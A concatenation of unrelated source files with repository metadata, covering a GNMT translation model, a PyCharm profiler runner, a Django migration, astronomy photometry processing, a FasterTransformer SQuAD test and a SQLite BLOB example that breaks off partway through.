print(s.expandtabs(tabsize=-3))
|
[
"pankaj.0323@gmail.com"
] |
pankaj.0323@gmail.com
|
63f26a8db8b11444b2c37dda05f8b04c536308c0
|
5fe709d0643394168dd919bbc721adabebe60a97
|
/profiler/translation/seq2seq/models/gnmt.py
|
b3bc9147c44775f20a46b6cbce1d24d4ee9b4917
|
[
"MIT"
] |
permissive
|
vibhatha/pipedream
|
8232b67366a0dd84e41fd496c9b2e8b86dbfdd89
|
af6b811f5d01a68e9eb91065e5242fc1a075f279
|
refs/heads/master
| 2020-12-20T18:21:35.337352
| 2020-07-06T04:54:23
| 2020-07-06T04:54:23
| 236,167,878
| 0
| 0
|
MIT
| 2020-01-25T12:34:04
| 2020-01-25T12:34:03
| null |
UTF-8
|
Python
| false
| false
| 2,830
|
py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import torch.nn as nn
from mlperf_compliance import mlperf_log
from seq2seq.utils import gnmt_print
import seq2seq.data.config as config
from seq2seq.models.seq2seq_base import Seq2Seq
from seq2seq.models.encoder import ResidualRecurrentEncoder
from seq2seq.models.decoder import ResidualRecurrentDecoder
import torchmodules.torchgraph as torchgraph
class GNMT(Seq2Seq):
    """GNMT v2 sequence-to-sequence model: a residual recurrent encoder and
    decoder, optionally sharing one token-embedding table."""

    def __init__(self, vocab_size, hidden_size=512, num_layers=8, bias=True,
                 dropout=0.2, batch_first=False, math='fp32',
                 share_embedding=False):
        """
        Constructor for the GNMT v2 model.

        :param vocab_size: size of vocabulary (number of tokens)
        :param hidden_size: internal hidden size of the model
        :param num_layers: number of layers, applies to both encoder and
            decoder
        :param bias: globally enables or disables bias in encoder and decoder
        :param dropout: probability of dropout (in encoder and decoder)
        :param batch_first: if True the model uses (batch, seq, feature)
            tensors, otherwise (seq, batch, feature)
        :param math: arithmetic type, 'fp32' or 'fp16'
        :param share_embedding: if True embeddings are shared between encoder
            and decoder
        """
        super(GNMT, self).__init__(batch_first=batch_first)

        # Emit MLPerf compliance log entries for the main hyper-parameters.
        gnmt_print(key=mlperf_log.MODEL_HP_NUM_LAYERS,
                   value=num_layers)
        gnmt_print(key=mlperf_log.MODEL_HP_HIDDEN_SIZE,
                   value=hidden_size)
        gnmt_print(key=mlperf_log.MODEL_HP_DROPOUT,
                   value=dropout)

        # When sharing, one embedding table is handed to both halves;
        # otherwise each half builds its own internally.
        embedder = (nn.Embedding(vocab_size, hidden_size,
                                 padding_idx=config.PAD)
                    if share_embedding else None)

        self.encoder = ResidualRecurrentEncoder(vocab_size, hidden_size,
                                                num_layers, bias, dropout,
                                                batch_first, embedder)
        self.decoder = ResidualRecurrentDecoder(vocab_size, hidden_size,
                                                num_layers, bias, dropout,
                                                batch_first, math, embedder)

    def forward(self, input_encoder, input_enc_len, input_decoder):
        """Encode the source batch, then decode conditioned on the result."""
        enc_context = self.encode(input_encoder, input_enc_len)
        dec_hidden = None
        if isinstance(enc_context, torchgraph.TensorWrapper):
            # Wrap the (None) initial hidden state so the profiler's graph
            # builder can trace it alongside the wrapped encoder output.
            dec_hidden = torchgraph.TensorWrapper(dec_hidden, "hidden",
                                                  enc_context.graph_creator)
        output, _, _ = self.decode(input_decoder,
                                   (enc_context, input_enc_len, dec_hidden))
        return output
|
[
"vibhatha@gmail.com"
] |
vibhatha@gmail.com
|
b221ad4641f6d3b0f304e77820b72eeb21327c1a
|
f4bf81d4e80468331a09401dbaeef12465aca853
|
/lib/python/helpers/profiler/run_profiler.py
|
d1054a5f28c84804105642bc0bdc2a81ea369adb
|
[] |
no_license
|
nottyo/intellibot
|
45c41d673608a0a1291c6387f9d33ef449f18837
|
0547d987deaad90260abe33db5284eae9704eb9b
|
refs/heads/master
| 2020-12-30T23:59:29.795725
| 2017-04-10T07:53:59
| 2017-04-10T07:53:59
| 86,574,980
| 1
| 0
| null | 2017-03-29T11:37:54
| 2017-03-29T11:37:53
| null |
UTF-8
|
Python
| false
| false
| 5,121
|
py
|
import os
import sys
import time
import traceback
from socket import AF_INET
from socket import SOCK_STREAM
from socket import socket
from _prof_imports import ProfilerResponse
from prof_io import ProfWriter, ProfReader
from prof_util import generate_snapshot_filepath, stats_to_response, get_snapshot_basepath, save_main_module, execfile
base_snapshot_path = os.getenv('PYCHARM_SNAPSHOT_PATH')
remote_run = bool(os.getenv('PYCHARM_REMOTE_RUN', ''))
def StartClient(host, port):
    """Connect to ``host:port``, retrying for up to MAX_TRIES attempts.

    Returns the connected socket on success. On exhausting all retries,
    reports the failure on stderr and terminates the process with exit
    code 1 (matching the original behavior).
    """
    s = socket(AF_INET, SOCK_STREAM)

    MAX_TRIES = 100
    for _ in range(MAX_TRIES):
        try:
            s.connect((host, port))
        except OSError:
            # Server may not be listening yet — back off briefly and retry.
            # (Was a bare `except:`, which also swallowed KeyboardInterrupt
            # and SystemExit; OSError covers all socket.error failures.)
            time.sleep(0.2)
            continue
        return s

    sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
    sys.stderr.flush()
    traceback.print_exc()
    sys.exit(1)  # TODO: is it safe?
class Profiler(object):
    """Profiling front-end that talks to the IDE over a socket.

    Picks the best available backend at construction time (vmprof, then
    yappi, then stdlib cProfile), runs a target script under it, and
    streams snapshots/statistics back through a ProfWriter/ProfReader pair.
    """
    def __init__(self):
        # Backend selection by preference: vmprof -> yappi -> cProfile.
        try:
            import vmprof_profiler
            self.profiling_backend = vmprof_profiler.VmProfProfile()
            self.profiling_backend.basepath = get_snapshot_basepath(base_snapshot_path, remote_run)
            print('Starting vmprof profiler\n')
        except ImportError:
            try:
                import yappi_profiler
                self.profiling_backend = yappi_profiler.YappiProfile()
                print('Starting yappi profiler\n')
            except ImportError:
                import cProfile
                self.profiling_backend = cProfile.Profile()
                print('Starting cProfile profiler\n')

    def connect(self, host, port):
        """Open the control connection to the IDE and start the reader thread."""
        s = StartClient(host, port)
        self.initializeNetwork(s)

    def initializeNetwork(self, sock):
        """Wrap `sock` with the protocol writer/reader; reader runs in a thread."""
        try:
            sock.settimeout(None)  # infinite, no timeouts from now on - jython does not have it
        except:
            pass
        self.writer = ProfWriter(sock)
        self.reader = ProfReader(sock, self)
        self.reader.start()
        time.sleep(0.1)  # give threads time to start

    def process(self, message):
        """Handle one incoming IDE request (currently only snapshot saves)."""
        if hasattr(message, 'save_snapshot'):
            self.save_snapshot(message.id, generate_snapshot_filepath(message.save_snapshot.filepath, remote_run, self.snapshot_extension()), remote_run)
        else:
            raise AssertionError("Unknown request %s" % dir(message))

    def run(self, file):
        """Execute `file` as __main__ under the profiler; always save a final snapshot."""
        m = save_main_module(file, 'run_profiler')
        globals = m.__dict__
        try:
            globals['__builtins__'] = __builtins__
        except NameError:
            pass  # Not there on Jython...
        self.start_profiling()
        try:
            execfile(file, globals, globals)  # execute the script
        finally:
            # Snapshot even if the profiled script raised.
            self.stop_profiling()
            self.save_snapshot(0, generate_snapshot_filepath(base_snapshot_path, remote_run, self.snapshot_extension()), remote_run)

    def start_profiling(self):
        self.profiling_backend.enable()

    def stop_profiling(self):
        self.profiling_backend.disable()

    def get_stats(self):
        """Materialize and return the backend's statistics object."""
        self.profiling_backend.create_stats()
        return self.profiling_backend.stats

    def has_tree_stats(self):
        # Only some backends (e.g. vmprof) can report call-tree stats.
        return hasattr(self.profiling_backend, 'tree_stats_to_response')

    def tree_stats_to_response(self, filename, response):
        return self.profiling_backend.tree_stats_to_response(filename, response)

    def snapshot_extension(self):
        """File extension for snapshots; backend-specific, defaults to '.pstat'."""
        if hasattr(self.profiling_backend, 'snapshot_extension'):
            return self.profiling_backend.snapshot_extension()
        return '.pstat'

    def dump_snapshot(self, filename):
        """Write backend stats to `filename`, creating parent dirs as needed."""
        dir = os.path.dirname(filename)
        if not os.path.exists(dir):
            os.makedirs(dir)
        self.profiling_backend.dump_stats(filename)
        return filename

    def save_snapshot(self, id, filename, send_stat=False):
        """Pause profiling, dump/send a snapshot response, then resume.

        When `send_stat` is False only the snapshot file path is sent;
        otherwise stats are serialized into the response itself.
        """
        self.stop_profiling()

        if filename is not None:
            filename = self.dump_snapshot(filename)
            print('Snapshot saved to %s' % filename)

        if not send_stat:
            response = ProfilerResponse(id=id, snapshot_filepath=filename)
        else:
            response = ProfilerResponse(id=id)
            stats_to_response(self.get_stats(), response)

        if self.has_tree_stats():
            self.tree_stats_to_response(filename, response)

        self.writer.addCommand(response)
        self.start_profiling()
if __name__ == '__main__':
    # Usage: run_profiler.py <host> <port> <script> [script args...]
    host, port, file = sys.argv[1], int(sys.argv[2]), sys.argv[3]

    # Strip our own three arguments so the profiled script sees a clean argv.
    del sys.argv[:3]

    profiler = Profiler()

    try:
        profiler.connect(host, port)
    except:
        sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
        traceback.print_exc()
        sys.exit(1)

    # add file path to sys.path
    sys.path.insert(0, os.path.split(file)[0])

    profiler.run(file)
|
[
"traitanit.hua@ascendcorp.com"
] |
traitanit.hua@ascendcorp.com
|
e54de02e976647aa74f068b06084f0e6aa09524f
|
0e60ed9251cd6e2ccc9645c45783a53fdabc22aa
|
/backend/home/migrations/0003_auto_20200613_0652.py
|
3f900f39b9ebe293952dd7350fd52cfd4ad1297b
|
[] |
no_license
|
crowdbotics-apps/mobile-13-dev-5964
|
7b522691afd94b4e7662ba5244abb1a8ab6768a3
|
dee9594b7a96748c4c729d77145a01c592339e01
|
refs/heads/master
| 2022-10-22T08:47:30.634185
| 2020-06-13T07:29:34
| 2020-06-13T07:29:34
| 271,942,482
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 972
|
py
|
# Generated by Django 2.2.13 on 2020-06-13 06:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add two relations on CustomText: `caasdc` (M2M to HomePage) and
    `sacscs` (nullable FK to the swappable auth user model)."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ("home", "0002_load_initial_data"),
    ]

    operations = [
        # Many-to-many link from CustomText to HomePage.
        migrations.AddField(
            model_name="customtext",
            name="caasdc",
            field=models.ManyToManyField(
                blank=True, related_name="customtext_caasdc", to="home.HomePage"
            ),
        ),
        # Optional FK to the user model; deleting the user cascades to the
        # CustomText rows that reference it.
        migrations.AddField(
            model_name="customtext",
            name="sacscs",
            field=models.ForeignKey(
                blank=True,
                null=True,
                on_delete=django.db.models.deletion.CASCADE,
                related_name="customtext_sacscs",
                to=settings.AUTH_USER_MODEL,
            ),
        ),
    ]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
a72bf1e2b39f2476cd8b658a62118d236cf164a7
|
4f026ddcf8f058d884f15259f0e42c2178eb2157
|
/roomlistwatcher/common/messaging/filters.py
|
787b395ad5017aa059aacbf980e915a82a2ffff0
|
[
"MIT"
] |
permissive
|
dnguyen0304/roomlistwatcher
|
afd95e5f601f77fc8d7c4cd4307e60f36b53162c
|
7ac4d5172de22dd8906662da521995c8e06c2617
|
refs/heads/master
| 2021-01-20T22:55:04.289589
| 2017-11-16T04:09:49
| 2017-11-16T04:09:49
| 101,829,306
| 0
| 0
| null | 2017-11-16T04:09:49
| 2017-08-30T02:38:56
|
Python
|
UTF-8
|
Python
| false
| false
| 382
|
py
|
# -*- coding: utf-8 -*-
import abc
class StringFilter(abc.ABC):
    """Abstract base class for string filters.

    NOTE: the original used the Python-2 idiom ``__metaclass__ =
    abc.ABCMeta``, which Python 3 silently ignores — the class was
    instantiable and ``filter`` was not enforced as abstract. Deriving
    from ``abc.ABC`` restores the intended contract.
    """

    @abc.abstractmethod
    def filter(self, string):
        """
        Parameters
        ----------
        string : str

        Returns
        -------
        str
            If the data should not be filtered. Otherwise None.
        """
        raise NotImplementedError
|
[
"dnguyen0304@gmail.com"
] |
dnguyen0304@gmail.com
|
76950567499f25a761480d17cfaa528a71dd1eda
|
522f4b1b18416443062ec53157340fb2d6f43b1b
|
/ch4/automate_possible_keys.py
|
028d5a70faf14dc5253f9c385bc41c6c444e2c5d
|
[] |
no_license
|
thewchan/impractical_python
|
fd3f3d82c6f45d1fd0dea55611bc8d5369c8982c
|
9963df374b7de5b3eb1faa58e45de7857c3fc792
|
refs/heads/master
| 2021-05-22T00:41:05.491349
| 2020-04-04T02:18:16
| 2020-04-04T02:18:16
| 252,884,952
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,151
|
py
|
"""
Pseudo-code
ask for length of key
initiate possible integers
get sum of positive integers
get negative integers
merge into 1 string
get permutation
loop through permutation and sum up abs values
eliminate those with sum not equal to sum of positive integers
print out list of tuples
"""
from itertools import permutations
# Prompt until the user supplies a valid integer key length.
while True:
    key_len = input("Enter length of key: ")
    try:
        key_len = int(key_len)
    except ValueError:
        print("Please enter a number.")
        continue
    break

# Candidate shift magnitudes are 1..key_len (the leading 0 is dropped).
positive_integers = list(range(key_len + 1))
positive_integers.pop(0)
print(
    "Possible key values (not including direction): ",
    *positive_integers,
)

# Each magnitude may also be used with a negative direction.
negative_integers = [-1 * x for x in positive_integers]
all_integers = positive_integers + negative_integers

# Keep only permutations whose absolute values are all distinct, i.e.
# each magnitude appears exactly once, in either direction.
raw_perms = list(permutations(all_integers, key_len))
filtered_perms = []
for perm in raw_perms:
    abs_perm = [abs(x) for x in perm]
    set_perm = set(abs_perm)
    if len(set_perm) == len(perm):
        filtered_perms.append(perm)

print("Valid key combinations:\n", *filtered_perms, sep='\n')
print(f"Number of valid key combinations: {len(filtered_perms)}")
|
[
"thewchan@gmail.com"
] |
thewchan@gmail.com
|
a5846c31c6b2366554d3e964fe1fab8ed55f1bb7
|
f228b0cbe141d23ad918f9fe7a40674ca8d7c963
|
/First_project.py
|
c59b3f5d3eea312d6cae46c1d93c796c070a73e0
|
[] |
no_license
|
Vazimax/My_first_project
|
a990996e753a979f8bc0393ce97837be55e84418
|
36b8c61a9e05ed9b35b5364521f79c906036415d
|
refs/heads/main
| 2023-01-23T06:04:43.082815
| 2020-11-24T18:47:02
| 2020-11-24T18:47:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
def odd_even_project():
    """Repeatedly read numbers and report odd/even until the user enters 'x'.

    Non-numeric entries (other than the exit sentinel) produce a retry
    message instead of terminating.
    """
    entry = input("Enter a number :")
    while entry != "x":
        try:
            parsed = int(entry)
        except ValueError:
            print("Please Enter a valid number")
        else:
            print("It's an even number =)" if parsed % 2 == 0
                  else "It's an odd number :)")
        entry = input("Enter a number again , and if you wanna exit press 'x' :")
|
[
"aboubakr.elhabti@gmail.com"
] |
aboubakr.elhabti@gmail.com
|
416028c8780dd01160c0b6dd3d29eb7302eda7ca
|
3b5ee9aa584bfca56dabc19d75717f6104c0dc95
|
/gaia/compute_synthetic_decam_fluxes.py
|
c4888f1d885e08e3fbaada340ff8434fa33f40ce
|
[] |
no_license
|
rongpu/desi-misc
|
95690ca99962940fd4a793d523edf4d2ce68b4c3
|
c700344ebf8f74391fcce69a47e4ca57fc4b34f8
|
refs/heads/master
| 2023-09-01T00:49:07.399914
| 2023-08-11T17:10:40
| 2023-08-11T17:10:40
| 173,173,912
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,939
|
py
|
# Convert the files from .csv.gz to .fits
from __future__ import division, print_function
import sys, os, glob, time, warnings, gc
import numpy as np
import matplotlib.pyplot as plt
from astropy.table import Table, vstack, hstack, join
import fitsio
from multiprocessing import Pool
from gaiaxpy import generate, PhotometricSystem
# Destination directory for the per-chunk synthetic DECam photometry tables.
output_dir = '/global/cfs/cdirs/desi/users/rongpu/data/gaia_dr3/xp_synthetic_decam_photometry'

# One input FITS file per Gaia XP continuous-mean-spectrum chunk.
fns = sorted(glob.glob('/pscratch/sd/r/rongpu/gaia_dr3/xp_continuous_mean_spectrum/XpContinuousMeanSpectrum_*.fits'))
print(len(fns))
def do_something(fn):
    """Generate synthetic DECam photometry for one XP spectrum chunk file.

    Reads the continuous mean spectra in `fn`, runs gaiaxpy synthetic
    photometry for the DECam system, converts fluxes to nanomaggies, and
    writes a trimmed table to `output_dir`. Skips files whose output
    already exists. Always returns None (used with Pool.map).
    """
    output_fn = os.path.join(output_dir, os.path.basename(fn).replace('XpContinuousMeanSpectrum_', 'XpSyntheticDECam_'))
    if os.path.isfile(output_fn):
        print(output_fn, 'already exists!')
        return None

    cat = Table(fitsio.read(fn))

    # Workaround to make the multidimensional arrays pandas-compatible:
    # append a dummy row, replace each vector column with a list of arrays
    # (ragged, so pandas stores objects), then drop the dummy row again.
    cat = vstack([cat, cat[:1].copy()])
    for col in ['bp_coefficients', 'bp_coefficient_errors', 'bp_coefficient_correlations', 'rp_coefficients', 'rp_coefficient_errors', 'rp_coefficient_correlations']:
        tmp = list(np.array(cat[col]))
        tmp.pop()
        tmp += [np.array([0])]
        cat[col] = tmp
    cat = cat[:-1]
    print(len(cat))
    cat = cat.to_pandas()

    phot_system = PhotometricSystem.DECam
    photom = generate(cat, photometric_system=phot_system, save_file=False)
    photom = Table.from_pandas(photom)

    # Sanity check: gaiaxpy fluxes satisfy mag = -2.5*log10(flux) - 56.1.
    print(np.allclose(photom['Decam_mag_g'], (-2.5*np.log10(photom['Decam_flux_g']))-56.1),
          np.allclose(photom['Decam_mag_r'], (-2.5*np.log10(photom['Decam_flux_r']))-56.1),
          np.allclose(photom['Decam_mag_i'], (-2.5*np.log10(photom['Decam_flux_i']))-56.1),
          np.allclose(photom['Decam_mag_z'], (-2.5*np.log10(photom['Decam_flux_z']))-56.1),
          np.allclose(photom['Decam_mag_Y'], (-2.5*np.log10(photom['Decam_flux_Y']))-56.1))

    # Convert to nanomaggies: 10**31.44 = 10**((22.5 + 56.1) / 2.5), i.e.
    # rescale from the zero point above to the 22.5-mag nanomaggy system.
    for col in ['Decam_flux_g', 'Decam_flux_r', 'Decam_flux_i', 'Decam_flux_z', 'Decam_flux_Y', 'Decam_flux_error_g', 'Decam_flux_error_r', 'Decam_flux_error_i', 'Decam_flux_error_z', 'Decam_flux_error_Y']:
        photom[col.replace('Decam_', '')] = photom[col] * 10**31.44

    # Second sanity check in the nanomaggy system.
    print(np.allclose(photom['Decam_mag_g'], (22.5-2.5*np.log10(photom['flux_g']))),
          np.allclose(photom['Decam_mag_r'], (22.5-2.5*np.log10(photom['flux_r']))),
          np.allclose(photom['Decam_mag_i'], (22.5-2.5*np.log10(photom['flux_i']))),
          np.allclose(photom['Decam_mag_z'], (22.5-2.5*np.log10(photom['flux_z']))),
          np.allclose(photom['Decam_mag_Y'], (22.5-2.5*np.log10(photom['flux_Y']))))

    # Keep only the identifier and converted flux columns.
    photom = photom[['source_id', 'flux_g', 'flux_r', 'flux_i', 'flux_z', 'flux_Y', 'flux_error_g', 'flux_error_r', 'flux_error_i', 'flux_error_z', 'flux_error_Y']]

    photom.write(output_fn)

    return None
# Fan the per-file conversion out over 16 worker processes; chunksize=1
# because each task is long-running and file sizes vary.
n_process = 16
with Pool(processes=n_process) as pool:
    res = pool.map(do_something, fns, chunksize=1)
|
[
"rongpu.zhou@gmail.com"
] |
rongpu.zhou@gmail.com
|
bffd8f4a50731672574fa8ad2fd5d12b21e6b2ef
|
35f9def6e6d327d3a4a4f2959024eab96f199f09
|
/developer/lab/tools/NVIDIA/FasterTransformer/sample/tensorflow/unit_test/squad_unit_test.py
|
a938652cd196387dd17c4e11a6540fd972e6272f
|
[
"Apache-2.0",
"CAL-1.0-Combined-Work-Exception",
"CAL-1.0",
"MIT",
"CC-BY-SA-4.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
arXiv-research/DevLab-III-1
|
ec10aef27e1ca75f206fea11014da8784752e454
|
c50cd2b9154c83c3db5e4a11b9e8874f7fb8afa2
|
refs/heads/main
| 2023-04-16T19:24:58.758519
| 2021-04-28T20:21:23
| 2021-04-28T20:21:23
| 362,599,929
| 2
| 0
|
MIT
| 2021-04-28T20:36:11
| 2021-04-28T20:36:11
| null |
UTF-8
|
Python
| false
| false
| 6,779
|
py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import argparse
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import os.path
import json
import copy
import sys
sys.path.append("./tensorflow/tensorflow_bert")
import tensorflow as tf
from squad_evaluate_v1_1 import evaluate
# from ckpt_type_convert import checkpoint_dtype_cast
class TestDecoding(unittest.TestCase):
    """End-to-end SQuAD accuracy tests for the FasterTransformer BERT encoder.

    setUpClass runs reference TensorFlow BERT inference once to establish a
    baseline F1 / exact-match score; each test then runs the FasterTransformer
    wrapper (fp32, fp16, fp16 with variable sequence length) and asserts its
    score is within 0.1 of that baseline.
    """
    is_init = False

    @classmethod
    def setUpClass(cls):
        super(TestDecoding, cls).setUpClass()
        if cls.is_init == False:
            cls.expected_version = '1.1'
            cls.truth_dataset = "squad_data/dev-v1.1.json"
            cls.fp32_model_path = "squad_model/model.ckpt"
            cls.fp16_model_path = "squad_fp16_model/model.ckpt"
            assert(os.path.isfile(cls.truth_dataset))
            assert(os.path.isfile(cls.fp32_model_path + ".index"))
            # Lazily derive the fp16 checkpoint from the fp32 one.
            if(not os.path.isfile(cls.fp16_model_path + ".index")):
                os.system("python tensorflow/tensorflow_bert/ckpt_type_convert.py --init_checkpoint={} --fp16_checkpoint={}".format(cls.fp32_model_path, cls.fp16_model_path))
            cls.tf_fp32_output_path = "squad_tf_output/fp32/"
            cls.ft_fp32_output_path = "squad_ft_output/fp32/"
            cls.ft_fp16_output_path = "squad_ft_output/fp16/"
            cls.predict_filename = "predictions.json"
            # Baseline: plain TensorFlow BERT inference on SQuAD dev.
            os.system("python tensorflow/tensorflow_bert/bert/run_squad.py \
                    --predict_batch_size=8 \
                    --vocab_file=squad_model/vocab.txt \
                    --bert_config_file=squad_model/bert_config.json \
                    --init_checkpoint={} \
                    --train_file=squad_data/train-v1.1.json \
                    --do_predict=True \
                    --predict_file=squad_data/dev-v1.1.json \
                    --max_seq_length=384 \
                    --output_dir={}".format(cls.fp32_model_path, cls.tf_fp32_output_path))
            # Note: run_evaluate is an instance method invoked on the class,
            # so `cls` is passed explicitly as `self`.
            cls.tf_fp32_score = cls.run_evaluate(cls, cls.tf_fp32_output_path + cls.predict_filename)
            print("[INFO] tensorflow results: {}".format(cls.tf_fp32_score))
            cls.is_init = True

    def run_evaluate(self, file_path):
        """Score the predictions in `file_path` against the truth dataset.

        Returns the dict produced by the official SQuAD v1.1 evaluator
        (keys 'f1' and 'exact_match').
        """
        with open(file_path) as f, open(self.truth_dataset) as b:
            f_json = json.load(f)
            b_json = json.load(b)
            if (b_json['version'] != self.expected_version):
                print('Evaluation expects v-' + self.expected_version +
                      ', but got dataset with v-' + b_json['version'],
                      file=sys.stderr)
            dataset = b_json['data']
            score = evaluate(dataset, f_json)
            return score

    def test_squad_fp32(self):
        # Fixed typo: log prefix was "{INFO]".
        print("[INFO] test_squad_fp32")
        # Tune GEMM algorithms for batch 8, seq 384, 12 heads, size-64 heads, fp32.
        os.system("./bin/encoder_gemm 8 384 12 64 0 0")
        os.system("python tensorflow/tensorflow_bert/run_squad_wrap.py \
                --floatx=float32 \
                --predict_batch_size=8 \
                --vocab_file=squad_model/vocab.txt \
                --bert_config_file=squad_model/bert_config.json \
                --init_checkpoint={} \
                --train_file=squad_data/train-v1.1.json \
                --do_predict=True \
                --predict_file=squad_data/dev-v1.1.json \
                --max_seq_length=384 \
                --output_dir={}".format(self.fp32_model_path, self.ft_fp32_output_path))
        os.system("rm gemm_config.in")
        self.ft_fp32_score = self.run_evaluate(self.ft_fp32_output_path + self.predict_filename)
        print("[INFO] fp32 results: {}".format(self.ft_fp32_score))
        # Accept at most a 0.1-point accuracy drop relative to the baseline.
        assert(self.ft_fp32_score['f1'] > self.tf_fp32_score['f1'] - 0.1)
        assert(self.ft_fp32_score['exact_match'] > self.tf_fp32_score['exact_match'] - 0.1)

    def test_squad_fp16(self):
        print("[INFO] test_squad_fp16")
        # Tune GEMM algorithms for fp16 (last-but-one flag = 1).
        os.system("./bin/encoder_gemm 8 384 12 64 1 0")
        os.system("python tensorflow/tensorflow_bert/run_squad_wrap.py \
                --floatx=float16 \
                --predict_batch_size=8 \
                --vocab_file=squad_model/vocab.txt \
                --bert_config_file=squad_model/bert_config.json \
                --init_checkpoint={} \
                --train_file=squad_data/train-v1.1.json \
                --do_predict=True \
                --predict_file=squad_data/dev-v1.1.json \
                --max_seq_length=384 \
                --output_dir={}".format(self.fp16_model_path, self.ft_fp16_output_path))
        os.system("rm gemm_config.in")
        self.ft_fp16_score = self.run_evaluate(self.ft_fp16_output_path + self.predict_filename)
        print("[INFO] fp16 results: {}".format(self.ft_fp16_score))
        assert(self.ft_fp16_score['f1'] > self.tf_fp32_score['f1'] - 0.1)
        assert(self.ft_fp16_score['exact_match'] > self.tf_fp32_score['exact_match'] - 0.1)

    def test_squad_fp16_varSeqlen(self):
        print("[INFO] test_squad_fp16_varSeqlen")
        # Variable-sequence-length path: padding removed, no GEMM pre-tuning.
        os.system("python tensorflow/tensorflow_bert/run_squad_wrap.py \
                --floatx=float16 \
                --predict_batch_size=8 \
                --vocab_file=squad_model/vocab.txt \
                --bert_config_file=squad_model/bert_config.json \
                --init_checkpoint={} \
                --train_file=squad_data/train-v1.1.json \
                --do_predict=True \
                --predict_file=squad_data/dev-v1.1.json \
                --max_seq_length=384 \
                --remove_padding=True \
                --output_dir={}".format(self.fp16_model_path, self.ft_fp16_output_path))
        self.ft_fp16_score_var_seqlen = self.run_evaluate(self.ft_fp16_output_path + self.predict_filename)
        print("[INFO] fp16 var seqlen results: {}".format(self.ft_fp16_score_var_seqlen))
        assert(self.ft_fp16_score_var_seqlen['f1'] > self.tf_fp32_score['f1'] - 0.1)
        assert(self.ft_fp16_score_var_seqlen['exact_match'] > self.tf_fp32_score['exact_match'] - 0.1)
if __name__ == "__main__":
    # Run the SQuAD accuracy tests (fp32, fp16, fp16 variable seqlen).
    unittest.main()
|
[
"noreply@github.com"
] |
arXiv-research.noreply@github.com
|
16c119f54f2264d169dc7c2f07b131d64908f831
|
9e5bf5e7d0bdfa4ff2aca65ac306ed801d146608
|
/python-26-pydb/pydb_07_blob.py
|
6afad0b37eb1f44b3fb571eef749d6f9edb40632
|
[] |
no_license
|
AuroraBoreas/python_advanced_tricks
|
90b07967789960beec381de676459c1e84b95860
|
ba0940e25eda52345a27cf9ddffed9d18fa2a031
|
refs/heads/master
| 2022-11-27T19:09:45.666017
| 2020-08-11T17:33:11
| 2020-08-11T17:33:11
| 275,083,831
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,887
|
py
|
import os, sqlite3
def convert_to_bytes(file):
    """Read *file* in binary mode and return its contents as bytes."""
    with open(file, 'rb') as handle:
        payload = handle.read()
    return payload
def convert_to_file(data, filename):
    """Write the bytes *data* out to *filename* in binary mode."""
    with open(filename, 'wb') as handle:
        handle.write(data)
    return
def create_table():
    """Create the `employees` table in blob.db next to this script.

    sqlite errors are reported, not raised; the connection is always
    closed.
    """
    db_path = os.path.join(os.path.dirname(__file__), "blob.db")
    # Fix: `conn` must exist even if connect() itself raises, otherwise the
    # `finally` block dies with NameError.
    conn = None
    try:
        conn = sqlite3.connect(db_path)
        cursor = conn.cursor()
        sql_cmd = """CREATE TABLE employees
                    (id INTEGER PRIMARY KEY,
                    name TEXT NOT NULL,
                    photo BLOB NOT NULL,
                    resume BLOB NOT NULL);"""
        cursor.execute(sql_cmd)
        conn.commit()
        print("Created table successfully.")
        cursor.close()
    except sqlite3.Error as e:
        print("Creating table failed.", e)
    finally:
        if conn:
            conn.close()
    return
def insertBlob(employeeId, name, picture, resume):
    """Insert one employee row, storing the picture and resume files as BLOBs.

    `picture` and `resume` are file paths; their raw bytes are stored.
    sqlite errors are reported and rolled back rather than raised.
    """
    db_path = os.path.join(os.path.dirname(__file__), "blob.db")
    # Fix: `conn` must exist even if connect() itself raises, otherwise the
    # except/finally blocks die with NameError.
    conn = None
    try:
        conn = sqlite3.connect(db_path)
        cursor = conn.cursor()
        sql_cmd = """INSERT INTO employees
                    (id, name, photo, resume)
                    VALUES (?, ?, ?, ?)"""
        employPic = convert_to_bytes(picture)
        employRes = convert_to_bytes(resume)
        record = (employeeId, name, employPic, employRes)
        cursor.execute(sql_cmd, record)
        conn.commit()
        print("Inserted the record successfully.")
        cursor.close()
    except sqlite3.Error as e:
        print("Inserting record failed.", e)
        if conn:
            conn.rollback()
    finally:
        if conn:
            conn.close()
    return
def readBlob():
    """Read every employee row, write the BLOBs back out as files, and open them.

    NOTE(review): os.startfile is Windows-only — this function will raise
    AttributeError on other platforms; confirm the intended target OS.
    """
    db_path = os.path.join(os.path.dirname(__file__), "blob.db")
    # Fix: `conn` must exist even if connect() itself raises, otherwise the
    # `finally` block dies with NameError.
    conn = None
    try:
        conn = sqlite3.connect(db_path)
        cursor = conn.cursor()
        sql_cmd = """SELECT * FROM employees"""
        cursor.execute(sql_cmd)
        for result in cursor.fetchall():
            Id, name, bytesphoto, bytesresume = result
            empphoto_path = os.path.join(os.path.dirname(__file__), f"picture_{Id}_{name}.jfif")
            empres_path = os.path.join(os.path.dirname(__file__), f"resume_{Id}_{name}.jfif")
            convert_to_file(bytesphoto, empphoto_path)
            convert_to_file(bytesresume, empres_path)
            print(f"id:{Id}, name:{name}")
            os.startfile(empphoto_path)
